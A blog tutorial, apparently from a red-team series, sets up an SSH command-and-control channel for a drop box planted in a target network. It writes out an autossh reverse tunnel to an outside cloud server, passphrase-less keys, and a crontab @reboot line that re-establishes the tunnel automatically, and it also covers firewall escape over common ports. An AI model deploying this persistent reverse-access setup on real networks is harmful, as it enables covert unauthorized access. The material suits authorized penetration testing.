« prev :: next »


SSH as C&C

While Nebula might provide a simpler, faster Command and Control (C&C) scheme than SSH, it may not work in all environments. Therefore, as a back-up method, I’ve decided to include instructions for creating a more traditional, SSH-based C&C method.

There are a few drawbacks to the SSH model:

  • It puts the C&C at risk if a drop box gets compromised.
  • With multiple pentesters and multiple drop-boxes, this method becomes overly complex.
  • All connections depend upon the C&C; if it goes down, all connections are lost.
  • Routing all traffic through the C&C increases latency as well as operational costs.

However, there is one big advantage:

  • Many corporate networks allow outbound TCP connections on common ports (e.g. SSH, HTTP, HTTPS).

Since the SSH daemon can be configured to listen on any TCP port, escaping the target’s firewall is a less daunting task. While the SSH method might have some flaws, it is more likely to succeed in networks where Nebula isn’t an option.


Setting Up the SSH C&C

To start with, we’ll need a C&C cloud server. Here are a few possibilities to consider:

For the sake of simplicity, I did none of these things. I hosted the SSH C&C on the same system as the Nebula C&C, and ran the SSH daemon as root listening on the default port: 22.

To begin, let’s log into the drop box:

haxys@straylight:~$ ssh root@192.168.1.2
root@192.168.1.2's password:
Linux kali 4.19.81-Re4son-v7+ #1 SMP Wed Nov 6 10:16:47 AEDT 2019 armv7l

Red-Team Drop Box: BOX-001
Property of Pentest Company Incorporated
Last login: Sat Dec  7 18:23:17 2019 from 10.42.42.100
root@kali:~#

Next, we’ll need to install autossh:

apt install autossh

Generate a new SSH key (with empty passphrase) to be used with the C&C server. In my case, I’m using Google Cloud, so I’ll be following their instructions for creating a new SSH key for their particular service. I make sure to use an empty password:

root@kali:~# ssh-keygen -t rsa -f ~/.ssh/cnc -C "cnc-service"
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/cnc.
Your public key has been saved in /root/.ssh/cnc.pub.
The key fingerprint is:
SHA256:QPDJm+UFprjEotGuKDWPAPLn3CnaFv2zi74JTpKEH80 cnc-service
The key's randomart image is:
+---[RSA 3072]----+
|    ... o        |
| . . = + .       |
|+ o + * . .      |
|o* = . * .       |
|+ B E.o S        |
|.* X....         |
|+ = B.o.         |
|.  *.o oo        |
|  ..o.=.o+       |
+----[SHA256]-----+

Next, I cat the contents of the cnc.pub file:

root@kali:~# cat ~/.ssh/cnc.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7kVzjtYhLBNIo/viLnVtdkjCDIT254ilQNAtpTls6tz3LZabkiK/8MnlTULhaWilpWhKcDn6NYj2cCinFWTezZ5uE4dDd54m0KAtqlaN0jseev8UUGnRqaFZWiNbeUh8GHAUuJBfsN2Cssc9j64ju/bz9XQXT8mvAnoVS8bwA+GfEMJjljSFquR7Ij9HHqYjYAi+gYpcb9mF8Kw3jOqjyb0WDz5qBr19YCBDSjZNBHWxzMTdlwwphdq4GJzJIIrANPruWZ4RSWyvYWy6DcK1WQxWiBQtQFiD0emhwxq+x08c3QqLqJG2pFiODTVy8s8zoX6xKHpsPh/79piNzwL8p9VUZ9DbLPItUhI11GMImr0hpVtq3hU68v2c0pX8/dJUSP30jZxT3sAy3efn7t2bNT0A6jVip1UxeDqOje0nZjW2+98OLlFhR3cHPCdieLkbG7sfc2TxFC8Id68VIjmQB0TztLKgEWe+HCMqriP7cKnzUAf9uQ5FcoOuI0Mv+JzE= cnc-service

Finally, I copy and paste the contents of the file into my Google Cloud SSH key metadata section:

CNC SSH Key

With this in place, I attempt to log into the SSH service from the drop box:

root@kali:~# ssh -i ~/.ssh/cnc cnc-service@104.154.194.215
The authenticity of host '104.154.194.215 (104.154.194.215)' can't be established.
ECDSA key fingerprint is SHA256:VlYHr38zi4yJXn/rWZzeOE/Nm4XRF6pR4GaKvQTjB5s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '104.154.194.215' (ECDSA) to the list of known hosts.
Linux nebula-master 4.19.0-6-cloud-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cnc-service@nebula-master:~$

Success! Now let’s test autossh. We want the following arrangement:

  1. autossh will connect to the C&C via keybased authentication.
  2. Port 22 on the drop box will be forwarded to port 6667 on the C&C server. (Port 6667 will only be available from the system itself.)

Let’s test this arrangement:

autossh -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/cnc -R 6667:127.0.0.1:22 cnc-service@104.154.194.215 -N

This will open a non-interactive session. To test the link from the pentester’s laptop, first create an SSH connection to your C&C, with port forwarding connecting your local port 6667 to port 6667 on the C&C server:

ssh cnc-service@104.154.194.215 -i ~/.ssh/cnc -L 6667:localhost:6667 -N

Next, from the same laptop, open another shell and SSH into root@localhost on port 6667, using the root password from the drop box:

haxys@freeside:~$ ssh root@localhost -p 6667
The authenticity of host '[localhost]:6667 ([127.0.0.1]:6667)' can't be established.
ECDSA key fingerprint is SHA256:V0zr5abt6HcXUD4YKkz0HqivdMwy8Eg0E0xhqTjq3FE.
Are you sure you want to continue connecting (yes/no/[finterprint])? yes
  ...
Red-Team Drop Box: BOX-001
Property of Pentest Company Incorporated
Last login: Sun Dec  8 00:27:49 2019 from 192.168.1.123
root@kali:~#

Wonderful! We can close all those SSH sessions now; our next move is to configure the drop box to automatically establish an SSH connection on system boot. Back on the drop box, run the following line to add autossh to the crontab:

sudo echo "@reboot root autossh -o \"PubkeyAuthentication=yes\" -o \"PasswordAuthentication=no\" -i /root/.ssh/cnc -R 0.0.0.0:6667:127.0.0.1:22 cnc-service@104.154.194.215 -f -N &" >> /etc/crontab

Now, when you reboot the system, autossh should automatically establish an SSH connection to the C&C and enable port forwarding. To test this, reboot the drop box:

shutdown -r now

Once the system comes back online, switch to your pentester laptop. Once again, use SSH to connect to the C&C system, forwarding port 6667:

ssh cnc-service@104.154.194.215 -i ~/.ssh/cnc -L 6667:localhost:6667 -N

Note: I copied the cnc-service keys from the drop box to the laptop, for the sake of simplicity. In your case, you might want to generate new keys for each system connecting to the C&C.

In another shell, use SSH to login as root through the forwarded port:

haxys@freeside:~$ ssh root@localhost -p 6667
root@localhost's password:
Linux kali 4.19.81-Re4son-v7+ #1 SMP Wed Nov 6 10:16:47 AEDT 2019 armv7l

Red-Team Drop Box: BOX-001
Property of Pentest Company Incorporated
Last login: Sun Dec  8 01:32:44 2019 from 127.0.0.1
root@kali:~#

Success! Once the drop box is planted in the target network, you’ll follow the same two steps to connect:

  1. Create a SSH connection to the C&C, forwarding port 6667.
  2. Connect via SSH to localhost port 6667.

In this way, you’re effectively creating two SSH tunnels, then creating a third SSH tunnel through the first two.


« prev :: next »